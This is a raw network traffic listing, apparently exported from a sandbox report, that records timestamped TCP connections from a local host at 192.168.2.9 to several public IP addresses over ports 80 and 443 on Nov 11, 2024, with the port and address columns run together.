                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580615997 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580617905 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580631971 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580636024 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580646038 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580657005 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580677032 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.580694914 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581140995 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581170082 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581182003 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581192017 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581197977 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581208944 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.581240892 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582004070 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582015991 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582026958 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582043886 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582082033 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582082033 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582098007 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582151890 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582901955 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582916021 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582930088 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582950115 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.582969904 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.584840059 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.584964991 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.661030054 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.661223888 CET8062616199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:28.661360979 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.076303005 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.077336073 CET6262080192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.077374935 CET6262080192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.081012011 CET6261980192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.081121922 CET806262344.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.081252098 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.081897974 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.085923910 CET806261918.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.086680889 CET806262344.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.086714029 CET6261580192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.088463068 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.088509083 CET6261680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.091763973 CET80626153.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.092123032 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.092453957 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.094445944 CET6262680192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.094726086 CET6262780192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.097059011 CET806262475.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.097157955 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.097234964 CET8062625199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.097315073 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.099328041 CET806262644.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.099400043 CET6262680192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.099946022 CET8062627208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.100004911 CET6262780192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106256962 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106554031 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106669903 CET6262680192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.106754065 CET6262780192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.109556913 CET6262880192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.111098051 CET806262475.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.111309052 CET8062625199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.111404896 CET806262644.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.112010956 CET8062627208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.114748955 CET8062628188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.114854097 CET6262880192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.117264986 CET6262880192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.122143984 CET8062628188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.510899067 CET806262344.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.510956049 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.517258883 CET806262344.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.517311096 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522852898 CET8062625199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522900105 CET8062625199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522912025 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.522944927 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.523556948 CET806262475.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.523610115 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.525649071 CET806262644.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.525711060 CET6262680192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.529113054 CET806262475.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.529274940 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.532814026 CET806262644.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.532871962 CET6262680192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.547198057 CET8062627208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.548219919 CET6262780192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.794085979 CET8062628188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.794161081 CET6262880192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.319785118 CET8062595178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.321158886 CET6259580192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.581701040 CET6260380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.581732035 CET6260380192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.584670067 CET6261380192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.585464954 CET6261480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.588968039 CET6261180192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.588999987 CET6261180192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.589442968 CET806261318.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.590276003 CET806261444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.634584904 CET62632443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.634629965 CET44362632188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.634845018 CET62632443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.637417078 CET62633443192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.637459993 CET4436263375.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.637512922 CET62633443192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640160084 CET6260980192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640512943 CET6261080192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640790939 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.644939899 CET8062609154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645564079 CET8062610208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645759106 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645843029 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.645968914 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.650819063 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.744774103 CET8062610208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.745031118 CET6261080192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.991812944 CET8062609154.212.231.82192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.992306948 CET6260980192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100305080 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100322962 CET806263423.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100389004 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.100425959 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:32.161417007 CET8062592199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:32.161472082 CET6259280192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.164213896 CET8062367188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.164328098 CET6236780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.551537037 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.556792021 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.556890011 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.557862997 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.562865973 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.562957048 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.593327999 CET8062371188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.593384027 CET6237180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632031918 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632278919 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.632932901 CET6263980192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.633280993 CET6264080192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.633970022 CET6264180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.636917114 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.637284040 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638114929 CET806263923.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638190985 CET6263980192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638355970 CET806264018.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638407946 CET6264080192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638761044 CET806264144.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.638811111 CET6264180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.742208004 CET8062612178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.742281914 CET6261280192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.874906063 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.874990940 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.879873991 CET8062643208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.879905939 CET806264444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.880003929 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.880029917 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.897934914 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.898344040 CET6264580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.902754068 CET806264444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.903866053 CET806264523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.903961897 CET6264580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.904076099 CET6264580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.908783913 CET806264523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.983376980 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.983454943 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.987322092 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.987395048 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.991420984 CET806263744.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.991487026 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.993288994 CET806263875.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.993347883 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.313124895 CET806264444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.313179970 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.321717978 CET806264444.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.321806908 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.358036041 CET806264523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.358048916 CET806264523.253.46.64192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.358120918 CET6264580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.656326056 CET8062617178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:34.656394958 CET6261780192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.492005110 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.497910023 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.498018980 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.540366888 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.545229912 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.613101959 CET6265080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.618134975 CET8062650199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.618204117 CET6265080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.649173021 CET6265180192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.649564981 CET6265280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.649785995 CET6265380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.650118113 CET6265480192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.650245905 CET6265580192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.650549889 CET6265680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.650975943 CET6265780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.653476954 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654066086 CET806265118.208.156.248192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654139042 CET6265180192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654592991 CET806265244.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654692888 CET6265280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654808044 CET806265344.221.84.105192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.654851913 CET6265380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655240059 CET80626543.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655288935 CET6265480192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655373096 CET806265575.2.71.199192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655385017 CET8062656199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655417919 CET6265580192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.655441999 CET6265680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.656658888 CET8062657188.114.96.3192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.656718969 CET6265780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.658276081 CET8062658178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.658337116 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.664788008 CET6265080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.670723915 CET8062650199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.681813002 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.989332914 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.410347939 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740261078 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740272045 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740328074 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740576029 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.740618944 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.741995096 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.742077112 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.744466066 CET80626483.94.10.34192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.744550943 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.748240948 CET8062658178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.748265982 CET8062658178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.748284101 CET8062658178.162.203.211192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:37.391514063 CET8062650199.191.50.83192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:37.395138025 CET6265080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:39.529169083 CET8062625199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:39.529227972 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.753482103 CET6237180192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.754178047 CET6237080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540652037 CET6265480192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540652037 CET6265780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540680885 CET6265380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540715933 CET6265580192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540772915 CET6265680192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540859938 CET6265280192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540860891 CET6265180192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.540877104 CET6265880192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.782387018 CET6264880192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.782597065 CET6265080192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.839986086 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840279102 CET6266780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.844789982 CET8062643208.100.26.245192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.845037937 CET8062667199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.845153093 CET6266780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.847888947 CET6266780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.852694035 CET8062667199.59.243.227192.168.2.9
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.858103991 CET6264580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.858146906 CET6266780192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.858233929 CET6264480192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.858329058 CET6264380192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.650612116 CET6259580192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.650783062 CET6259780192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.650815964 CET6259680192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.842330933 CET6221580192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.917800903 CET6259380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.917865038 CET6259280192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.600526094 CET6236680192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.600660086 CET6259980192.168.2.9199.191.50.83
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.600766897 CET6260080192.168.2.93.94.10.34
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.600992918 CET6236880192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:50.601623058 CET6236780192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189429045 CET6263480192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189610004 CET6261080192.168.2.9208.100.26.245
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189712048 CET62633443192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189812899 CET6261280192.168.2.9178.162.203.211
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189850092 CET6260980192.168.2.9154.212.231.82
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189879894 CET62632443192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:51.189913988 CET6260480192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.456419945 CET6263780192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.456459999 CET6263880192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.456567049 CET6264080192.168.2.918.208.156.248
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.456585884 CET6263980192.168.2.923.253.46.64
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.456609964 CET6264180192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.721388102 CET6262380192.168.2.944.221.84.105
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.721519947 CET6262880192.168.2.9188.114.96.3
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.721637011 CET6262580192.168.2.9199.59.243.227
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.721669912 CET6262480192.168.2.975.2.71.199
                                                                                                                                                                                                            Nov 11, 2024 18:08:53.721729994 CET6262680192.168.2.944.221.84.105
